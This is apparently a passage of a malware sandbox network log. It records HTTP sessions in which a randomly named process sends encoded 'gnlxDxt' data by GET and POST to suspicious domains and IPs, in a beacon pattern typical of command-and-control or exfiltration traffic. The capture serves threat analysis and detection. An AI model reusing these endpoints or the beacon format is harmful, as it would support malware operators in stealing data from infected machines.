gnlxDxt=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFIhCCpYsn9WreaiGrar+mbpKXdw5HlY7AulXjlhxd7jiae5YIH/DWVG22dHFzVm4c/VReWfAoFRIFkO96DhtzvF6YwLlCw4YoZDt9GJaORorvgNlR6QckiGjLB/bD1K/X/ivCXjRC71ld7j6Vr6eyW7p9XJQRfiVfI2Z0DUT96XrbqeHRUEkeeILR1wA2BSR8ocUXxTjRr+lvZmSsUKijJEFqaGMcBomY0Cywq9be0McJlKkpJN8+VNyCNCmnCReMgFrAKax8nIn2zmerJTojE0dipfD0LwC1LkFmonAvwYF394bntXZwxHC2eyeGm0mmUcOhpPF9+VYh56k86C7qv39VgEU9+Deir3D22szOVf5AzB2rzjsqa0HS0hUWXNPmeueRLhEUNqvpsfiyytgv16cj8vNcGIEpYxF+cSHXC1IY0yEvaw44+HB5ZMiJ4nry8MgT7tAOLmYfZ6qo2zZ2XFvhcuYAO7GxNo6rHGvl3abEXj2ZDmTjMyqBCkbqZ5OL2iUM0gJddJD81dEvntMHVWRMi4gATZ/BjLZwE8BQywjBr5ZeUIUDil9OMkD+UZM2YAjCnQZdcGZIb7rMWTzrnmyslnyz5vCfEXiBqxVd8YL0JhH5jN4sS7hHQuThugUxWD7uV4DWnnTORF8NkL3jGAm9Q2eCVK9NzZA7MKp86cw4nWGxrfWiZWjnHu3WSaZ2H+PCd1uANCKw7SjYW6kGC0PB0GeZvQjvspVQRRDyBb2Ma7geZlh/2icE37qYtdMwT1H1QuBeQlJpJ63s9A8kc/ScP/hdE1HxltfJkb59Bsg7A9CJWBafcS7exWGRWhNE/rmJFIley3It/9GJYSq0sraC03WTphnLfXi80a8mKiFFwc5y78HxoiobEKjqVwdcVyDLeXJNcadB48VBkR8Oz7Iq3atNdqZ2wYG/cdkqxsJJGUFN7F8bZepCQlq2d0xdkp [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49803	103.120.80.111	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:04.993350029 CET	536	OUT	GET /5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.313333.xyz Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:51:06.514564991 CET	1236	IN	HTTP/1.1 200 OK Server: wts/1.7.0 Date: Wed, 11 Dec 2024 03:51:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: "65517fce-1a10" Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 33 31 33 33 33 33 2e 78 79 7a 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 31 33 33 33 33 2e 78 79 7a 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e [TRUNCATED] Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>313333.xyz-(www.west.cn)</title> <meta name="description" content="313333.xyz," /> <meta name="keywords" content="313333.xyz," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
Dec 11, 2024 04:51:06.514604092 CET	1236	IN	Data Raw: 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 20 20 68 31 Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd, ul,
Dec 11, 2024 04:51:06.514728069 CET	1236	IN	Data Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
Dec 11, 2024 04:51:06.514740944 CET	1236	IN	Data Raw: 69 7a 65 3a 20 32 34 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 Data Ascii: ize: 24px } .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color:
Dec 11, 2024 04:51:06.514853001 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d Data Ascii: .footer-link span { padding: 0 6px; } </style></head><body> <div class="banner-out"> <div class="banner1"> <div class="wrap"> <h1>313333.xyz</h1>
Dec 11, 2024 04:51:06.514864922 CET	708	IN	Data Raw: 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e c6 f3 d2 b5 d3 ca cf e4 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a Data Ascii: " target="_blank"></a> </div> </div> </div> <script> $(function() { $('#J_footerLink a').click(function() { var href = $(this).attr('href'); wind

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49819	38.180.232.109	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:12.500242949 CET	809	OUT	POST /wdm1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.mosquitoxp.lol Origin: http://www.mosquitoxp.lol Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.mosquitoxp.lol/wdm1/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 7a 6e 72 42 54 45 4c 4a 69 2f 2b 61 4d 61 4f 6b 71 51 2b 6a 44 2f 76 79 6e 46 5a 31 57 78 6f 2f 79 74 33 78 51 6a 37 71 65 54 34 5a 53 44 46 30 39 37 37 51 36 36 6c 32 66 70 66 31 31 45 6c 62 68 6a 75 2b 6b 45 62 77 64 63 76 39 64 74 43 74 35 7a 2b 6f 2b 6f 52 33 45 35 66 69 78 4d 72 79 41 75 44 33 31 33 50 6b 2f 4b 4a 39 62 2b 65 77 74 63 56 32 54 4a 47 4f 6d 39 4d 30 34 66 56 34 38 30 2f 70 35 4f 48 47 58 69 61 6b 36 33 67 54 41 37 76 56 78 70 52 67 41 56 6f 39 79 51 46 38 6d 65 42 64 53 31 30 4d 33 2b 2b 30 79 6d 68 56 52 35 77 42 32 38 2b 68 2b 78 49 4e 2b 63 6e 30 2f 41 3d 3d Data Ascii: gnlxDxt=znrBTELJi/+aMaOkqQ+jD/vynFZ1Wxo/yt3xQj7qeT4ZSDF0977Q66l2fpf11Elbhju+kEbwdcv9dtCt5z+o+oR3E5fixMryAuD313Pk/KJ9b+ewtcV2TJGOm9M04fV480/p5OHGXiak63gTA7vVxpRgAVo9yQF8meBdS10M3++0ymhVR5wB28+h+xIN+cn0/A==
Dec 11, 2024 04:51:13.696995974 CET	413	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:50:52 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49825	38.180.232.109	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:15.166853905 CET	829	OUT	POST /wdm1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.mosquitoxp.lol Origin: http://www.mosquitoxp.lol Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.mosquitoxp.lol/wdm1/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 7a 6e 72 42 54 45 4c 4a 69 2f 2b 61 4f 36 2b 6b 73 78 2b 6a 45 66 76 78 69 46 5a 31 66 52 6f 37 79 71 2f 78 51 69 2f 36 65 68 4d 5a 53 6d 68 30 6e 35 66 51 7a 71 6c 32 55 4a 66 77 37 6b 6b 5a 68 6a 71 4d 6b 41 62 77 64 66 54 39 64 6f 2b 74 36 43 2b 72 34 34 52 35 66 4a 66 73 38 73 72 79 41 75 44 33 31 33 4b 7a 2f 4b 68 39 62 4f 4f 77 38 4a 35 31 61 70 47 4e 68 39 4d 30 75 66 56 6b 38 30 2f 78 35 50 61 72 58 68 75 6b 36 32 51 54 42 76 44 57 2f 5a 52 69 4e 31 70 71 69 6c 6f 6d 6d 73 45 73 63 6a 31 73 35 75 71 62 7a 67 73 50 41 49 52 57 6b 38 61 53 6a 32 42 35 7a 66 61 39 6b 41 47 43 45 67 52 36 52 33 4f 57 4e 6c 56 36 71 2f 45 42 4d 43 49 3d Data Ascii: gnlxDxt=znrBTELJi/+aO6+ksx+jEfvxiFZ1fRo7yq/xQi/6ehMZSmh0n5fQzql2UJfw7kkZhjqMkAbwdfT9do+t6C+r44R5fJfs8sryAuD313Kz/Kh9bOOw8J51apGNh9M0ufVk80/x5ParXhuk62QTBvDW/ZRiN1pqilommsEscj1s5uqbzgsPAIRWk8aSj2B5zfa9kAGCEgR6R3OWNlV6q/EBMCI=
Dec 11, 2024 04:51:16.397347927 CET	413	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:50:55 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49831	38.180.232.109	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:17.832076073 CET	10911	OUT	POST /wdm1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.mosquitoxp.lol Origin: http://www.mosquitoxp.lol Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.mosquitoxp.lol/wdm1/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 7a 6e 72 42 54 45 4c 4a 69 2f 2b 61 4f 36 2b 6b 73 78 2b 6a 45 66 76 78 69 46 5a 31 66 52 6f 37 79 71 2f 78 51 69 2f 36 65 68 30 5a 53 30 70 30 6b 5a 6a 51 68 36 6c 32 50 70 66 78 37 6b 6b 59 68 6e 2b 49 6b 42 6e 67 64 5a 66 39 63 4b 6d 74 79 51 47 72 32 34 52 35 58 70 66 68 78 4d 72 6e 41 75 54 7a 31 33 61 7a 2f 4b 68 39 62 4d 47 77 73 73 56 31 57 4a 47 4f 6d 39 4d 47 34 66 56 59 38 30 48 68 35 50 76 57 58 53 32 6b 36 57 41 54 48 61 76 57 39 35 52 6b 4b 31 70 69 69 6c 74 34 6d 73 5a 54 63 6a 6f 37 35 73 32 62 78 68 31 35 55 70 39 64 78 76 79 77 77 30 6c 71 39 64 57 7a 39 78 57 4e 4d 44 64 6b 46 7a 4b 68 43 32 38 46 37 4e 63 71 5a 47 33 75 6e 42 67 72 65 30 4c 6f 61 45 2f 68 61 59 61 41 6c 30 73 65 46 6e 6c 6b 4e 6d 54 50 64 61 2f 67 71 61 6a 47 67 30 6e 54 47 79 38 74 72 31 6d 46 6e 31 6a 4e 63 4f 56 61 6a 48 63 42 52 6d 55 35 59 6e 39 47 54 58 73 36 6f 4f 4f 44 6d 65 37 34 53 7a 61 78 4d 34 2f 7a 63 32 4b 4f 6f 6d 62 67 4e 51 78 48 52 38 53 67 50 6d 72 42 55 57 54 43 6f 30 [TRUNCATED] Data Ascii: gnlxDxt=znrBTELJi/+aO6+ksx+jEfvxiFZ1fRo7yq/xQi/6eh0ZS0p0kZjQh6l2Ppfx7kkYhn+IkBngdZf9cKmtyQGr24R5XpfhxMrnAuTz13az/Kh9bMGwssV1WJGOm9MG4fVY80Hh5PvWXS2k6WATHavW95RkK1piilt4msZTcjo75s2bxh15Up9dxvyww0lq9dWz9xWNMDdkFzKhC28F7NcqZG3unBgre0LoaE/haYaAl0seFnlkNmTPda/gqajGg0nTGy8tr1mFn1jNcOVajHcBRmU5Yn9GTXs6oOODme74SzaxM4/zc2KOombgNQxHR8SgPmrBUWTCo0OmNyna/1Q/0G6v/HTv8VYNdBTVrEzWlJSdCFi2SfxAZBpmALswZrf44CSEKFv8rtaBcY5dkPqGMNIZ8viyX5E1lIXnUDt9QUXLTltty4y1KCMUj4W8txwyJWVtXwfgivT3fZYLgtphDkcVvauo4aMM4aeA5n4tMGREsEQQddLs/V3zYwyj6Ns5U6Px/fat/4ddrSekkoAPjbEvbWX3RMFmzWmkoXMjcROYyK4/QHlV5ylNbjaI3sMczZLByNYNMZsFMGjt6MWt0nd4Htjum7tBRcxGle3YPwc8H1R6xl9jFwZPWp0NDC24AzOuvkeu4V7dUuITN/M4wSO2pyBOuGbZQvDiAFIcVF7FuOEIRwDtG/ROzN1MNG4fZB+4oy26FM78Lw0tuufkD2GKjtb4cjDQnWosjXwsI5EAqU+fxaVOk21Y+LNFr31xIPrenArHLrHL97UnmtFUtNZbMOPaemjiHCV4OolHmK87ltstDE1QAEsr6H5CPuRlfy0mEy9X19fCjfpTNRSG+rcfhjyXd30zq+22VYHpSxgZr6DIOGcM8xZdtL//NPhNiskX53NKYIE5L0fIPXsANPBm1DdCA3Zo1FK6rj9wEFRDjby2SnE+VtDzNKDeKYmT+3c8AQ3/SLYm3soqfmr6C8XuI8D6q4uainV+GgpC79uC [TRUNCATED]
Dec 11, 2024 04:51:19.144105911 CET	413	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:50:58 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49842	38.180.232.109	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:20.552975893 CET	540	OUT	GET /wdm1/?Cpbp2=zjh46zEHi&gnlxDxt=+lDhQwjcqciYGoyMlAmqcMzIngJLQFU8yJeyXm7/HR5vK2UrnZr15LQFOKrK4FY+rjusngfyUMfjWLDl7Hie+r5rQKPTgM+Sd/Dx7kDur+5/ev3d9JlPdbQ= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mosquitoxp.lol Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:51:21.718976974 CET	413	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:51:01 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49858	172.67.158.81	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:27.196443081 CET	803	OUT	POST /0hqe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.mzkd6gp5.top Origin: http://www.mzkd6gp5.top Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.mzkd6gp5.top/0hqe/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 77 49 53 4d 44 39 64 61 65 77 52 30 39 7a 4a 75 70 31 78 50 55 6c 70 72 77 36 57 31 70 72 74 58 6e 59 54 50 72 4c 33 52 67 31 69 51 38 38 66 73 30 31 67 64 73 30 76 44 4b 6f 6f 64 59 6d 6a 4e 4e 44 50 36 67 45 61 52 71 51 64 65 62 43 74 39 30 69 48 6a 56 59 42 69 6a 6d 61 44 63 6f 6d 4a 71 61 6c 31 63 64 56 58 43 77 65 54 70 63 72 46 34 73 4b 4c 63 78 69 52 77 74 59 6d 30 4d 55 6d 34 30 48 51 79 62 68 6e 7a 72 38 38 78 2b 6b 2b 50 58 42 75 73 46 64 47 77 34 33 59 35 58 53 69 6d 57 61 47 52 30 47 31 30 32 79 59 78 6d 2f 68 44 51 65 6e 71 51 3d 3d Data Ascii: gnlxDxt=OIoVhjzUgo83wISMD9daewR09zJup1xPUlprw6W1prtXnYTPrL3Rg1iQ88fs01gds0vDKoodYmjNNDP6gEaRqQdebCt90iHjVYBijmaDcomJqal1cdVXCweTpcrF4sKLcxiRwtYm0MUm40HQybhnzr88x+k+PXBusFdGw43Y5XSimWaGR0G102yYxm/hDQenqQ==
Dec 11, 2024 04:51:28.731141090 CET	972	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:51:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btpgPfwJtTDsT4%2Fm0CJzRCd7R9DMZMlMycl%2FpT%2BnPexrCz5GQ3fLUEMzhKd%2Fz%2FzWmBS%2FojWv7pO5AsliUky74uR9Oo00sB2y7g3CIGl97KKXOdM7TB%2BLaEoI2ZBslzJ6107B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f028430bdb9728c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Dec 11, 2024 04:51:28.731714964 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
